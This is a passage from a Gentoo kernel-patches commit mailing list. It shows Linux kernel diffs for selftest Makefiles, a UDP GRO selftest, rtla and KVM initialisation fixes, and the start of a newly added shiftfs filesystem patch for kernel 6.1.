+--- a/tools/testing/selftests/net/udpgso_bench_rx.c
++++ b/tools/testing/selftests/net/udpgso_bench_rx.c
+@@ -214,11 +214,10 @@ static void do_verify_udp(const char *data, int len)
+ 
+ static int recv_msg(int fd, char *buf, int len, int *gso_size)
+ {
+-	char control[CMSG_SPACE(sizeof(uint16_t))] = {0};
++	char control[CMSG_SPACE(sizeof(int))] = {0};
+ 	struct msghdr msg = {0};
+ 	struct iovec iov = {0};
+ 	struct cmsghdr *cmsg;
+-	uint16_t *gsosizeptr;
+ 	int ret;
+ 
+ 	iov.iov_base = buf;
+@@ -237,8 +236,7 @@ static int recv_msg(int fd, char *buf, int len, int *gso_size)
+ 		     cmsg = CMSG_NXTHDR(&msg, cmsg)) {
+ 			if (cmsg->cmsg_level == SOL_UDP
+ 			    && cmsg->cmsg_type == UDP_GRO) {
+-				gsosizeptr = (uint16_t *) CMSG_DATA(cmsg);
+-				*gso_size = *gsosizeptr;
++				*gso_size = *(int *)CMSG_DATA(cmsg);
+ 				break;
+ 			}
+ 		}
+diff --git a/tools/testing/selftests/perf_events/Makefile b/tools/testing/selftests/perf_events/Makefile
+index fcafa5f0d34c0..db93c4ff081a4 100644
+--- a/tools/testing/selftests/perf_events/Makefile
++++ b/tools/testing/selftests/perf_events/Makefile
+@@ -1,5 +1,5 @@
+ # SPDX-License-Identifier: GPL-2.0
+-CFLAGS += -Wl,-no-as-needed -Wall -I../../../../usr/include
++CFLAGS += -Wl,-no-as-needed -Wall $(KHDR_INCLUDES)
+ LDFLAGS += -lpthread
+ 
+ TEST_GEN_PROGS := sigtrap_threads remove_on_exec
+diff --git a/tools/testing/selftests/pid_namespace/Makefile b/tools/testing/selftests/pid_namespace/Makefile
+index edafaca1aeb39..9286a1d22cd3a 100644
+--- a/tools/testing/selftests/pid_namespace/Makefile
++++ b/tools/testing/selftests/pid_namespace/Makefile
+@@ -1,5 +1,5 @@
+ # SPDX-License-Identifier: GPL-2.0
+-CFLAGS += -g -I../../../../usr/include/
++CFLAGS += -g $(KHDR_INCLUDES)
+ 
+ TEST_GEN_PROGS = regression_enomem
+ 
+diff --git a/tools/testing/selftests/pidfd/Makefile b/tools/testing/selftests/pidfd/Makefile
+index 778b6cdc8aed8..d731e3e76d5bf 100644
+--- a/tools/testing/selftests/pidfd/Makefile
++++ b/tools/testing/selftests/pidfd/Makefile
+@@ -1,5 +1,5 @@
+ # SPDX-License-Identifier: GPL-2.0-only
+-CFLAGS += -g -I../../../../usr/include/ -pthread -Wall
++CFLAGS += -g $(KHDR_INCLUDES) -pthread -Wall
+ 
+ TEST_GEN_PROGS := pidfd_test pidfd_fdinfo_test pidfd_open_test \
+ 	pidfd_poll_test pidfd_wait pidfd_getfd_test pidfd_setns_test
+diff --git a/tools/testing/selftests/powerpc/ptrace/Makefile b/tools/testing/selftests/powerpc/ptrace/Makefile
+index 2f02cb54224dc..cbeeaeae8837a 100644
+--- a/tools/testing/selftests/powerpc/ptrace/Makefile
++++ b/tools/testing/selftests/powerpc/ptrace/Makefile
+@@ -33,7 +33,7 @@ TESTS_64 := $(patsubst %,$(OUTPUT)/%,$(TESTS_64))
+ $(TESTS_64): CFLAGS += -m64
+ $(TM_TESTS): CFLAGS += -I../tm -mhtm
+ 
+-CFLAGS += -I../../../../../usr/include -fno-pie
++CFLAGS += $(KHDR_INCLUDES) -fno-pie
+ 
+ $(OUTPUT)/ptrace-gpr: ptrace-gpr.S
+ $(OUTPUT)/ptrace-pkey $(OUTPUT)/core-pkey: LDLIBS += -pthread
+diff --git a/tools/testing/selftests/powerpc/security/Makefile b/tools/testing/selftests/powerpc/security/Makefile
+index 7488315fd8474..e0d979ab02040 100644
+--- a/tools/testing/selftests/powerpc/security/Makefile
++++ b/tools/testing/selftests/powerpc/security/Makefile
+@@ -5,7 +5,7 @@ TEST_PROGS := mitigation-patching.sh
+ 
+ top_srcdir = ../../../../..
+ 
+-CFLAGS += -I../../../../../usr/include
++CFLAGS += $(KHDR_INCLUDES)
+ 
+ include ../../lib.mk
+ 
+diff --git a/tools/testing/selftests/powerpc/syscalls/Makefile b/tools/testing/selftests/powerpc/syscalls/Makefile
+index b63f8459c704e..d1f2648b112b6 100644
+--- a/tools/testing/selftests/powerpc/syscalls/Makefile
++++ b/tools/testing/selftests/powerpc/syscalls/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0-only
+ TEST_GEN_PROGS := ipc_unmuxed rtas_filter
+ 
+-CFLAGS += -I../../../../../usr/include
++CFLAGS += $(KHDR_INCLUDES)
+ 
+ top_srcdir = ../../../../..
+ include ../../lib.mk
+diff --git a/tools/testing/selftests/powerpc/tm/Makefile b/tools/testing/selftests/powerpc/tm/Makefile
+index 5881e97c73c13..3876805c2f312 100644
+--- a/tools/testing/selftests/powerpc/tm/Makefile
++++ b/tools/testing/selftests/powerpc/tm/Makefile
+@@ -17,7 +17,7 @@ $(TEST_GEN_PROGS): ../harness.c ../utils.c
+ CFLAGS += -mhtm
+ 
+ $(OUTPUT)/tm-syscall: tm-syscall-asm.S
+-$(OUTPUT)/tm-syscall: CFLAGS += -I../../../../../usr/include
++$(OUTPUT)/tm-syscall: CFLAGS += $(KHDR_INCLUDES)
+ $(OUTPUT)/tm-tmspr: CFLAGS += -pthread
+ $(OUTPUT)/tm-vmx-unavail: CFLAGS += -pthread -m64
+ $(OUTPUT)/tm-resched-dscr: ../pmu/lib.c
+diff --git a/tools/testing/selftests/ptp/Makefile b/tools/testing/selftests/ptp/Makefile
+index ef06de0898b73..eeab44cc68638 100644
+--- a/tools/testing/selftests/ptp/Makefile
++++ b/tools/testing/selftests/ptp/Makefile
+@@ -1,5 +1,5 @@
+ # SPDX-License-Identifier: GPL-2.0
+-CFLAGS += -I../../../../usr/include/
++CFLAGS += $(KHDR_INCLUDES)
+ TEST_PROGS := testptp
+ LDLIBS += -lrt
+ all: $(TEST_PROGS)
+diff --git a/tools/testing/selftests/rseq/Makefile b/tools/testing/selftests/rseq/Makefile
+index 215e1067f0376..3a173e184566c 100644
+--- a/tools/testing/selftests/rseq/Makefile
++++ b/tools/testing/selftests/rseq/Makefile
+@@ -4,7 +4,7 @@ ifneq ($(shell $(CC) --version 2>&1 | head -n 1 | grep clang),)
+ CLANG_FLAGS += -no-integrated-as
+ endif
+ 
+-CFLAGS += -O2 -Wall -g -I./ -I../../../../usr/include/ -L$(OUTPUT) -Wl,-rpath=./ \
++CFLAGS += -O2 -Wall -g -I./ $(KHDR_INCLUDES) -L$(OUTPUT) -Wl,-rpath=./ \
+ 	  $(CLANG_FLAGS)
+ LDLIBS += -lpthread -ldl
+ 
+diff --git a/tools/testing/selftests/sched/Makefile b/tools/testing/selftests/sched/Makefile
+index 10c72f14fea9d..099ee9213557a 100644
+--- a/tools/testing/selftests/sched/Makefile
++++ b/tools/testing/selftests/sched/Makefile
+@@ -4,7 +4,7 @@ ifneq ($(shell $(CC) --version 2>&1 | head -n 1 | grep clang),)
+ CLANG_FLAGS += -no-integrated-as
+ endif
+ 
+-CFLAGS += -O2 -Wall -g -I./ -I../../../../usr/include/  -Wl,-rpath=./ \
++CFLAGS += -O2 -Wall -g -I./ $(KHDR_INCLUDES) -Wl,-rpath=./ \
+ 	  $(CLANG_FLAGS)
+ LDLIBS += -lpthread
+ 
+diff --git a/tools/testing/selftests/seccomp/Makefile b/tools/testing/selftests/seccomp/Makefile
+index f017c382c0369..584fba4870372 100644
+--- a/tools/testing/selftests/seccomp/Makefile
++++ b/tools/testing/selftests/seccomp/Makefile
+@@ -1,5 +1,5 @@
+ # SPDX-License-Identifier: GPL-2.0
+-CFLAGS += -Wl,-no-as-needed -Wall -isystem ../../../../usr/include/
++CFLAGS += -Wl,-no-as-needed -Wall $(KHDR_INCLUDES)
+ LDFLAGS += -lpthread
+ LDLIBS += -lcap
+ 
+diff --git a/tools/testing/selftests/sync/Makefile b/tools/testing/selftests/sync/Makefile
+index d0121a8a3523a..df0f91bf6890d 100644
+--- a/tools/testing/selftests/sync/Makefile
++++ b/tools/testing/selftests/sync/Makefile
+@@ -1,6 +1,6 @@
+ # SPDX-License-Identifier: GPL-2.0
+ CFLAGS += -O2 -g -std=gnu89 -pthread -Wall -Wextra
+-CFLAGS += -I../../../../usr/include/
++CFLAGS += $(KHDR_INCLUDES)
+ LDFLAGS += -pthread
+ 
+ .PHONY: all clean
+diff --git a/tools/testing/selftests/user_events/Makefile b/tools/testing/selftests/user_events/Makefile
+index c765d8635d9af..87d54c6400681 100644
+--- a/tools/testing/selftests/user_events/Makefile
++++ b/tools/testing/selftests/user_events/Makefile
+@@ -1,5 +1,5 @@
+ # SPDX-License-Identifier: GPL-2.0
+-CFLAGS += -Wl,-no-as-needed -Wall -I../../../../usr/include
++CFLAGS += -Wl,-no-as-needed -Wall $(KHDR_INCLUDES)
+ LDLIBS += -lrt -lpthread -lm
+ 
+ TEST_GEN_PROGS = ftrace_test dyn_test perf_test
+diff --git a/tools/testing/selftests/vm/Makefile b/tools/testing/selftests/vm/Makefile
+index 163c2fde3cb3a..192ea3725c5c8 100644
+--- a/tools/testing/selftests/vm/Makefile
++++ b/tools/testing/selftests/vm/Makefile
+@@ -23,7 +23,7 @@ MACHINE ?= $(shell echo $(uname_M) | sed -e 's/aarch64.*/arm64/' -e 's/ppc64.*/p
+ # LDLIBS.
+ MAKEFLAGS += --no-builtin-rules
+ 
+-CFLAGS = -Wall -I $(top_srcdir) -I $(top_srcdir)/usr/include $(EXTRA_CFLAGS) $(KHDR_INCLUDES)
++CFLAGS = -Wall -I $(top_srcdir) $(EXTRA_CFLAGS) $(KHDR_INCLUDES)
+ LDLIBS = -lrt -lpthread
+ TEST_GEN_FILES = compaction_test
+ TEST_GEN_FILES += gup_test
+diff --git a/tools/testing/selftests/x86/Makefile b/tools/testing/selftests/x86/Makefile
+index 0388c4d60af0e..ca9374b56ead1 100644
+--- a/tools/testing/selftests/x86/Makefile
++++ b/tools/testing/selftests/x86/Makefile
+@@ -34,7 +34,7 @@ BINARIES_64 := $(TARGETS_C_64BIT_ALL:%=%_64)
+ BINARIES_32 := $(patsubst %,$(OUTPUT)/%,$(BINARIES_32))
+ BINARIES_64 := $(patsubst %,$(OUTPUT)/%,$(BINARIES_64))
+ 
+-CFLAGS := -O2 -g -std=gnu99 -pthread -Wall
++CFLAGS := -O2 -g -std=gnu99 -pthread -Wall $(KHDR_INCLUDES)
+ 
+ # call32_from_64 in thunks.S uses absolute addresses.
+ ifeq ($(CAN_BUILD_WITH_NOPIE),1)
+diff --git a/tools/tracing/rtla/src/osnoise_hist.c b/tools/tracing/rtla/src/osnoise_hist.c
+index 5d7ea479ac89f..fe34452fc4ec0 100644
+--- a/tools/tracing/rtla/src/osnoise_hist.c
++++ b/tools/tracing/rtla/src/osnoise_hist.c
+@@ -121,6 +121,7 @@ static void osnoise_hist_update_multiple(struct osnoise_tool *tool, int cpu,
+ {
+ 	struct osnoise_hist_params *params = tool->params;
+ 	struct osnoise_hist_data *data = tool->data;
++	unsigned long long total_duration;
+ 	int entries = data->entries;
+ 	int bucket;
+ 	int *hist;
+@@ -131,10 +132,12 @@ static void osnoise_hist_update_multiple(struct osnoise_tool *tool, int cpu,
+ 	if (data->bucket_size)
+ 		bucket = duration / data->bucket_size;
+ 
++	total_duration = duration * count;
++
+ 	hist = data->hist[cpu].samples;
+ 	data->hist[cpu].count += count;
+ 	update_min(&data->hist[cpu].min_sample, &duration);
+-	update_sum(&data->hist[cpu].sum_sample, &duration);
++	update_sum(&data->hist[cpu].sum_sample, &total_duration);
+ 	update_max(&data->hist[cpu].max_sample, &duration);
+ 
+ 	if (bucket < entries)
+diff --git a/virt/kvm/coalesced_mmio.c b/virt/kvm/coalesced_mmio.c
+index 0be80c213f7f2..5ef88f5a08640 100644
+--- a/virt/kvm/coalesced_mmio.c
++++ b/virt/kvm/coalesced_mmio.c
+@@ -187,15 +187,17 @@ int kvm_vm_ioctl_unregister_coalesced_mmio(struct kvm *kvm,
+ 			r = kvm_io_bus_unregister_dev(kvm,
+ 				zone->pio ? KVM_PIO_BUS : KVM_MMIO_BUS, &dev->dev);
+ 
++			kvm_iodevice_destructor(&dev->dev);
++
+ 			/*
+ 			 * On failure, unregister destroys all devices on the
+ 			 * bus _except_ the target device, i.e. coalesced_zones
+-			 * has been modified.  No need to restart the walk as
+-			 * there aren't any zones left.
++			 * has been modified.  Bail after destroying the target
++			 * device, there's no need to restart the walk as there
++			 * aren't any zones left.
+ 			 */
+ 			if (r)
+ 				break;
+-			kvm_iodevice_destructor(&dev->dev);
+ 		}
+ 	}
+ 
+diff --git a/virt/kvm/kvm_main.c b/virt/kvm/kvm_main.c
+index fab4d37905785..3a3c1bc3e303f 100644
+--- a/virt/kvm/kvm_main.c
++++ b/virt/kvm/kvm_main.c
+@@ -5935,12 +5935,6 @@ int kvm_init(void *opaque, unsigned vcpu_size, unsigned vcpu_align,
+ 
+ 	kvm_chardev_ops.owner = module;
+ 
+-	r = misc_register(&kvm_dev);
+-	if (r) {
+-		pr_err("kvm: misc device register failed\n");
+-		goto out_unreg;
+-	}
+-
+ 	register_syscore_ops(&kvm_syscore_ops);
+ 
+ 	kvm_preempt_ops.sched_in = kvm_sched_in;
+@@ -5949,11 +5943,24 @@ int kvm_init(void *opaque, unsigned vcpu_size, unsigned vcpu_align,
+ 	kvm_init_debug();
+ 
+ 	r = kvm_vfio_ops_init();
+-	WARN_ON(r);
++	if (WARN_ON_ONCE(r))
++		goto err_vfio;
++
++	/*
++	 * Registration _must_ be the very last thing done, as this exposes
++	 * /dev/kvm to userspace, i.e. all infrastructure must be setup!
++	 */
++	r = misc_register(&kvm_dev);
++	if (r) {
++		pr_err("kvm: misc device register failed\n");
++		goto err_register;
++	}
+ 
+ 	return 0;
+ 
+-out_unreg:
++err_register:
++	kvm_vfio_ops_exit();
++err_vfio:
+ 	kvm_async_pf_deinit();
+ out_free_4:
+ 	for_each_possible_cpu(cpu)
+@@ -5979,8 +5986,14 @@ void kvm_exit(void)
+ {
+ 	int cpu;
+ 
+-	debugfs_remove_recursive(kvm_debugfs_dir);
++	/*
++	 * Note, unregistering /dev/kvm doesn't strictly need to come first,
++	 * fops_get(), a.k.a. try_module_get(), prevents acquiring references
++	 * to KVM while the module is being stopped.
++	 */
+ 	misc_deregister(&kvm_dev);
++
++	debugfs_remove_recursive(kvm_debugfs_dir);
+ 	for_each_possible_cpu(cpu)
+ 		free_cpumask_var(per_cpu(cpu_kick_mask, cpu));
+ 	kmem_cache_destroy(kvm_vcpu_cache);


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-03-06 17:30 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-03-06 17:30 UTC (permalink / raw
  To: gentoo-commits

commit:     66dd8dbc053422be2cf35862fe70e7996615c0e8
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Mon Mar  6 17:29:51 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Mon Mar  6 17:29:51 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=66dd8dbc

Add shifts back

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README            |    4 +
 5000_shiftfs-6.1.patch | 2249 ++++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 2253 insertions(+)

diff --git a/0000_README b/0000_README
index dca64867..6e5b60b1 100644
--- a/0000_README
+++ b/0000_README
@@ -147,6 +147,10 @@ Patch:  4567_distro-Gentoo-Kconfig.patch
 From:   Tom Wijsman <TomWij@gentoo.org>
 Desc:   Add Gentoo Linux support config settings and defaults.
 
+Patch:  5000_shiftfs-6.1.patch
+From:   https://github.com/toby63/shiftfs-dkms
+Desc:   Kernel fs for Linux that provides easier uid/gid-shifting for containers
+
 Patch:  5010_enable-cpu-optimizations-universal.patch
 From:   https://github.com/graysky2/kernel_compiler_patch
 Desc:   Kernel >= 5.15 patch enables gcc = v11.1+ optimizations for additional CPUs.

diff --git a/5000_shiftfs-6.1.patch b/5000_shiftfs-6.1.patch
new file mode 100644
index 00000000..f0c715e3
--- /dev/null
+++ b/5000_shiftfs-6.1.patch
@@ -0,0 +1,2249 @@
+--- /dev/null	2023-03-06 07:06:05.852282227 -0500
++++ b/fs/shiftfs.c	2023-03-06 11:58:38.389647656 -0500
+@@ -0,0 +1,2203 @@
++#include <linux/btrfs.h>
++#include <linux/capability.h>
++#include <linux/cred.h>
++#include <linux/mount.h>
++#include <linux/fdtable.h>
++#include <linux/file.h>
++#include <linux/fs.h>
++#include <linux/namei.h>
++#include <linux/module.h>
++#include <linux/kernel.h>
++#include <linux/magic.h>
++#include <linux/parser.h>
++#include <linux/security.h>
++#include <linux/seq_file.h>
++#include <linux/statfs.h>
++#include <linux/slab.h>
++#include <linux/user_namespace.h>
++#include <linux/uidgid.h>
++#include <linux/xattr.h>
++#include <linux/posix_acl.h>
++#include <linux/posix_acl_xattr.h>
++#include <linux/uio.h>
++#include <linux/fiemap.h>
++#include <linux/pagemap.h>
++
++struct shiftfs_super_info {
++	struct vfsmount *mnt;
++	struct user_namespace *userns;
++	/* creds of process who created the super block */
++	const struct cred *creator_cred;
++	bool mark;
++	unsigned int passthrough;
++	unsigned int passthrough_mark;
++};
++
++static void shiftfs_fill_inode(struct inode *inode, unsigned long ino,
++			       umode_t mode, dev_t dev, struct dentry *dentry);
++
++#define SHIFTFS_PASSTHROUGH_NONE 0
++#define SHIFTFS_PASSTHROUGH_STAT 1
++#define SHIFTFS_PASSTHROUGH_IOCTL 2
++#define SHIFTFS_PASSTHROUGH_ALL                                                \
++	(SHIFTFS_PASSTHROUGH_STAT | SHIFTFS_PASSTHROUGH_IOCTL)
++
++static inline bool shiftfs_passthrough_ioctls(struct shiftfs_super_info *info)
++{
++	if (!(info->passthrough & SHIFTFS_PASSTHROUGH_IOCTL))
++		return false;
++
++	return true;
++}
++
++static inline bool shiftfs_passthrough_statfs(struct shiftfs_super_info *info)
++{
++	if (!(info->passthrough & SHIFTFS_PASSTHROUGH_STAT))
++		return false;
++
++	return true;
++}
++
++enum {
++	OPT_MARK,
++	OPT_PASSTHROUGH,
++	OPT_LAST,
++};
++
++/* global filesystem options */
++static const match_table_t tokens = {
++	{ OPT_MARK, "mark" },
++	{ OPT_PASSTHROUGH, "passthrough=%u" },
++	{ OPT_LAST, NULL }
++};
++
++static const struct cred *shiftfs_override_creds(const struct super_block *sb)
++{
++	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
++
++	return override_creds(sbinfo->creator_cred);
++}
++
++static inline void shiftfs_revert_object_creds(const struct cred *oldcred,
++					       struct cred *newcred)
++{
++	revert_creds(oldcred);
++	put_cred(newcred);
++}
++
++static kuid_t shift_kuid(struct user_namespace *from, struct user_namespace *to,
++			 kuid_t kuid)
++{
++	uid_t uid = from_kuid(from, kuid);
++	return make_kuid(to, uid);
++}
++
++static kgid_t shift_kgid(struct user_namespace *from, struct user_namespace *to,
++			 kgid_t kgid)
++{
++	gid_t gid = from_kgid(from, kgid);
++	return make_kgid(to, gid);
++}
++
++static int shiftfs_override_object_creds(const struct super_block *sb,
++					 const struct cred **oldcred,
++					 struct cred **newcred,
++					 struct dentry *dentry, umode_t mode,
++					 bool hardlink)
++{
++	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
++	kuid_t fsuid = current_fsuid();
++	kgid_t fsgid = current_fsgid();
++
++	*oldcred = shiftfs_override_creds(sb);
++
++	*newcred = prepare_creds();
++	if (!*newcred) {
++		revert_creds(*oldcred);
++		return -ENOMEM;
++	}
++
++	(*newcred)->fsuid = shift_kuid(sb->s_user_ns, sbinfo->userns, fsuid);
++	(*newcred)->fsgid = shift_kgid(sb->s_user_ns, sbinfo->userns, fsgid);
++
++	if (!hardlink) {
++		int err = security_dentry_create_files_as(dentry, mode,
++							  &dentry->d_name,
++							  *oldcred, *newcred);
++		if (err) {
++			shiftfs_revert_object_creds(*oldcred, *newcred);
++			return err;
++		}
++	}
++
++	put_cred(override_creds(*newcred));
++	return 0;
++}
++
++static void shiftfs_copyattr(struct inode *from, struct inode *to)
++{
++	struct user_namespace *from_ns = from->i_sb->s_user_ns;
++	struct user_namespace *to_ns = to->i_sb->s_user_ns;
++
++	to->i_uid = shift_kuid(from_ns, to_ns, from->i_uid);
++	to->i_gid = shift_kgid(from_ns, to_ns, from->i_gid);
++	to->i_mode = from->i_mode;
++	to->i_atime = from->i_atime;
++	to->i_mtime = from->i_mtime;
++	to->i_ctime = from->i_ctime;
++	i_size_write(to, i_size_read(from));
++}
++
++static void shiftfs_copyflags(struct inode *from, struct inode *to)
++{
++	unsigned int mask = S_SYNC | S_IMMUTABLE | S_APPEND | S_NOATIME;
++
++	inode_set_flags(to, from->i_flags & mask, mask);
++}
++
++static void shiftfs_file_accessed(struct file *file)
++{
++	struct inode *upperi, *loweri;
++
++	if (file->f_flags & O_NOATIME)
++		return;
++
++	upperi = file_inode(file);
++	loweri = upperi->i_private;
++
++	if (!loweri)
++		return;
++
++	upperi->i_mtime = loweri->i_mtime;
++	upperi->i_ctime = loweri->i_ctime;
++
++	touch_atime(&file->f_path);
++}
++
++static int shiftfs_parse_mount_options(struct shiftfs_super_info *sbinfo,
++				       char *options)
++{
++	char *p;
++	substring_t args[MAX_OPT_ARGS];
++
++	sbinfo->mark = false;
++	sbinfo->passthrough = 0;
++
++	while ((p = strsep(&options, ",")) != NULL) {
++		int err, intarg, token;
++
++		if (!*p)
++			continue;
++
++		token = match_token(p, tokens, args);
++		switch (token) {
++		case OPT_MARK:
++			sbinfo->mark = true;
++			break;
++		case OPT_PASSTHROUGH:
++			err = match_int(&args[0], &intarg);
++			if (err)
++				return err;
++
++			if (intarg & ~SHIFTFS_PASSTHROUGH_ALL)
++				return -EINVAL;
++
++			sbinfo->passthrough = intarg;
++			break;
++		default:
++			return -EINVAL;
++		}
++	}
++
++	return 0;
++}
++
++static void shiftfs_d_release(struct dentry *dentry)
++{
++	struct dentry *lowerd = dentry->d_fsdata;
++
++	if (lowerd)
++		dput(lowerd);
++}
++
++static struct dentry *shiftfs_d_real(struct dentry *dentry,
++				     const struct inode *inode)
++{
++	struct dentry *lowerd = dentry->d_fsdata;
++
++	if (inode && d_inode(dentry) == inode)
++		return dentry;
++
++	lowerd = d_real(lowerd, inode);
++	if (lowerd && (!inode || inode == d_inode(lowerd)))
++		return lowerd;
++
++	WARN(1, "shiftfs_d_real(%pd4, %s:%lu): real dentry not found\n", dentry,
++	     inode ? inode->i_sb->s_id : "NULL", inode ? inode->i_ino : 0);
++	return dentry;
++}
++
++static int shiftfs_d_weak_revalidate(struct dentry *dentry, unsigned int flags)
++{
++	int err = 1;
++	struct dentry *lowerd = dentry->d_fsdata;
++
++	if (d_is_negative(lowerd) != d_is_negative(dentry))
++		return 0;
++
++	if ((lowerd->d_flags & DCACHE_OP_WEAK_REVALIDATE))
++		err = lowerd->d_op->d_weak_revalidate(lowerd, flags);
++
++	if (d_really_is_positive(dentry)) {
++		struct inode *inode = d_inode(dentry);
++		struct inode *loweri = d_inode(lowerd);
++
++		shiftfs_copyattr(loweri, inode);
++	}
++
++	return err;
++}
++
++static int shiftfs_d_revalidate(struct dentry *dentry, unsigned int flags)
++{
++	int err = 1;
++	struct dentry *lowerd = dentry->d_fsdata;
++
++	if (d_unhashed(lowerd) ||
++	    ((d_is_negative(lowerd) != d_is_negative(dentry))))
++		return 0;
++
++	if (flags & LOOKUP_RCU)
++		return -ECHILD;
++
++	if ((lowerd->d_flags & DCACHE_OP_REVALIDATE))
++		err = lowerd->d_op->d_revalidate(lowerd, flags);
++
++	if (d_really_is_positive(dentry)) {
++		struct inode *inode = d_inode(dentry);
++		struct inode *loweri = d_inode(lowerd);
++
++		shiftfs_copyattr(loweri, inode);
++	}
++
++	return err;
++}
++
++static const struct dentry_operations shiftfs_dentry_ops = {
++	.d_release	   = shiftfs_d_release,
++	.d_real		   = shiftfs_d_real,
++	.d_revalidate	   = shiftfs_d_revalidate,
++	.d_weak_revalidate = shiftfs_d_weak_revalidate,
++};
++
++static const char *shiftfs_get_link(struct dentry *dentry, struct inode *inode,
++				    struct delayed_call *done)
++{
++	const char *p;
++	const struct cred *oldcred;
++	struct dentry *lowerd;
++
++	/* RCU lookup not supported */
++	if (!dentry)
++		return ERR_PTR(-ECHILD);
++
++	lowerd = dentry->d_fsdata;
++	oldcred = shiftfs_override_creds(dentry->d_sb);
++	p = vfs_get_link(lowerd, done);
++	revert_creds(oldcred);
++
++	return p;
++}
++
++static int shiftfs_setxattr(struct dentry *dentry, struct inode *inode,
++			    const char *name, const void *value,
++			    size_t size, int flags)
++{
++	struct dentry *lowerd = dentry->d_fsdata;
++	int err;
++	const struct cred *oldcred;
++
++	oldcred = shiftfs_override_creds(dentry->d_sb);
++	err = vfs_setxattr(&init_user_ns, lowerd, name, value, size, flags);
++	revert_creds(oldcred);
++
++	shiftfs_copyattr(lowerd->d_inode, inode);
++
++	return err;
++}
++
++static int shiftfs_xattr_get(const struct xattr_handler *handler,
++			     struct dentry *dentry, struct inode *inode,
++			     const char *name, void *value, size_t size)
++{
++	struct dentry *lowerd = dentry->d_fsdata;
++	int err;
++	const struct cred *oldcred;
++
++	oldcred = shiftfs_override_creds(dentry->d_sb);
++	err = vfs_getxattr(&init_user_ns, lowerd, name, value, size);
++	revert_creds(oldcred);
++
++	return err;
++}
++
++static ssize_t shiftfs_listxattr(struct dentry *dentry, char *list,
++				 size_t size)
++{
++	struct dentry *lowerd = dentry->d_fsdata;
++	int err;
++	const struct cred *oldcred;
++
++	oldcred = shiftfs_override_creds(dentry->d_sb);
++	err = vfs_listxattr(lowerd, list, size);
++	revert_creds(oldcred);
++
++	return err;
++}
++
++static int shiftfs_removexattr(struct user_namespace *ns,
++			       struct dentry *dentry, const char *name)
++{
++	struct dentry *lowerd = dentry->d_fsdata;
++	int err;
++	const struct cred *oldcred;
++
++	oldcred = shiftfs_override_creds(dentry->d_sb);
++	err = vfs_removexattr(&init_user_ns, lowerd, name);
++	revert_creds(oldcred);
++
++	/* update c/mtime */
++	shiftfs_copyattr(lowerd->d_inode, d_inode(dentry));
++
++	return err;
++}
++
++static int shiftfs_xattr_set(const struct xattr_handler *handler,
++			     struct user_namespace *ns,
++			     struct dentry *dentry, struct inode *inode,
++			     const char *name, const void *value, size_t size,
++			     int flags)
++{
++	if (!value)
++		return shiftfs_removexattr(&init_user_ns, dentry, name);
++	return shiftfs_setxattr(dentry, inode, name, value, size, flags);
++}
++
++static int shiftfs_inode_test(struct inode *inode, void *data)
++{
++	return inode->i_private == data;
++}
++
++static int shiftfs_inode_set(struct inode *inode, void *data)
++{
++	inode->i_private = data;
++	return 0;
++}
++
++static int shiftfs_create_object(struct inode *diri, struct dentry *dentry,
++				 umode_t mode, const char *symlink,
++				 struct dentry *hardlink, bool excl)
++{
++	int err;
++	const struct cred *oldcred;
++	struct cred *newcred;
++	void *loweri_iop_ptr = NULL;
++	umode_t modei = mode;
++	struct super_block *dir_sb = diri->i_sb;
++	struct dentry *lowerd_new = dentry->d_fsdata;
++	struct inode *inode = NULL, *loweri_dir = diri->i_private;
++	const struct inode_operations *loweri_dir_iop = loweri_dir->i_op;
++	struct dentry *lowerd_link = NULL;
++
++	if (hardlink) {
++		loweri_iop_ptr = loweri_dir_iop->link;
++	} else {
++		switch (mode & S_IFMT) {
++		case S_IFDIR:
++			loweri_iop_ptr = loweri_dir_iop->mkdir;
++			break;
++		case S_IFREG:
++			loweri_iop_ptr = loweri_dir_iop->create;
++			break;
++		case S_IFLNK:
++			loweri_iop_ptr = loweri_dir_iop->symlink;
++			break;
++		case S_IFSOCK:
++			/* fall through */
++		case S_IFIFO:
++			loweri_iop_ptr = loweri_dir_iop->mknod;
++			break;
++		}
++	}
++	if (!loweri_iop_ptr) {
++		err = -EINVAL;
++		goto out_iput;
++	}
++
++	inode_lock_nested(loweri_dir, I_MUTEX_PARENT);
++
++	if (!hardlink) {
++		inode = new_inode(dir_sb);
++		if (!inode) {
++			err = -ENOMEM;
++			goto out_iput;
++		}
++
++		/*
++		 * new_inode() will have added the new inode to the super
++		 * block's list of inodes. Further below we will call
++		 * inode_insert5() Which would perform the same operation again
++		 * thereby corrupting the list. To avoid this raise I_CREATING
++		 * in i_state which will cause inode_insert5() to skip this
++		 * step. I_CREATING will be cleared by d_instantiate_new()
++		 * below.
++		 */
++		spin_lock(&inode->i_lock);
++		inode->i_state |= I_CREATING;
++		spin_unlock(&inode->i_lock);
++
++		inode_init_owner(&init_user_ns, inode, diri, mode);
++		modei = inode->i_mode;
++	}
++
++	err = shiftfs_override_object_creds(dentry->d_sb, &oldcred, &newcred,
++					    dentry, modei, hardlink != NULL);
++	if (err)
++		goto out_iput;
++
++	if (hardlink) {
++		lowerd_link = hardlink->d_fsdata;
++		err = vfs_link(lowerd_link, &init_user_ns, loweri_dir, lowerd_new, NULL);
++	} else {
++		switch (modei & S_IFMT) {
++		case S_IFDIR:
++			err = vfs_mkdir(&init_user_ns, loweri_dir, lowerd_new, modei);
++			break;
++		case S_IFREG:
++			err = vfs_create(&init_user_ns, loweri_dir, lowerd_new, modei, excl);
++			break;
++		case S_IFLNK:
++			err = vfs_symlink(&init_user_ns, loweri_dir, lowerd_new, symlink);
++			break;
++		case S_IFSOCK:
++			/* fall through */
++		case S_IFIFO:
++			err = vfs_mknod(&init_user_ns, loweri_dir, lowerd_new, modei, 0);
++			break;
++		default:
++			err = -EINVAL;
++			break;
++		}
++	}
++
++	shiftfs_revert_object_creds(oldcred, newcred);
++
